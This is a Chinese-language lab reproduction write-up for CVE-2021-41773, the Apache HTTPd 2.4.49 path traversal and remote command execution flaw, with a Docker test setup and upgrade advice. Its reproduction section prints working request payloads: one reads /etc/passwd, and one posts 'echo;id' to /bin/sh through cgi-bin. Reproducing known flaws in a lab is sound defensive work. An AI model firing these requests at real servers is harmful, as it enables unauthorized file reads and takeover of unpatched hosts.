CVE-2021-41773 Apache HTTPd 2.4.49 路徑穿越以及RCE漏洞

0x00 簡介

Apache HTTPd是Apache基金會開源的一款流行的HTTP伺服器。

0x01 漏洞概述

2021年10月6日Apache HTTPd官方釋出安全更新，披露了CVE-2021-41773 Apache HTTPd 2.4.49 路徑穿越漏洞。在其2.4.49版本中，引入了一個路徑穿越漏洞。在路徑穿越目錄允許被訪問的的情況下，例如配置了 <Directory />Require all granted</Directory>，攻擊者可利用該路徑穿越漏洞讀取到Web目錄之外的其他檔案。同時若Apache HTTPd開啟了cgi支援，攻擊者可構造惡意請求執行命令，控制伺服器。

0x02 影響版本

Apache HTTPd 2.4.49版本 且穿越的目錄允許被訪問。

0x03 環境搭建

git clone https://github.com/blasty/CVE-2021-41773

cd CVE-2021-41773

docker-compose build && docker-compose up -d

docker ps 檢視映象所對應埠

訪問ip加8080端口出現如下介面即可

0x04 漏洞復現

任意檔案讀取：

訪問介面抓包

直接打payloda即可

Poc：

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1

Host: xxx.xxx.xxx.xxx:8080

User-Agent: Mozilla/5.0 (X11; FreeBSD i386 6.73; rv:220.59) Gecko/20100101 Chrome/175.28 OPR/220.59;

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

If-Modified-Since: Thu, 14 Oct 2021 06:00:45 GMT

If-None-Match: "29cd-5ce49cca73d40-gzip"

Cache-Control: max-age=0

命令執行：

訪問介面抓包

Poc：

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1

Host: xxx.xxx.xxx.xxx:8080

User-Agent: Mozilla/5.0 (X11; FreeBSD i386 6.73; rv:220.59) Gecko/20100101 Chrome/175.28 OPR/220.59;

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

If-Modified-Since: Thu, 14 Oct 2021 06:00:45 GMT

If-None-Match: "29cd-5ce49cca73d40-gzip"

Cache-Control: max-age=0

Content-Type: application/x-www-form-urlencoded

Content-Length: 7

echo;id

0x05 修復方式

1、若低於 2.4.49版本，可不升級。

2、若Apache HTTPd為 2.4.49版本，請儘快升級至最新版本。

參考連結：

https://mp.weixin.qq.com/s/-iZcn0M9a1uA64pkVB8Jkw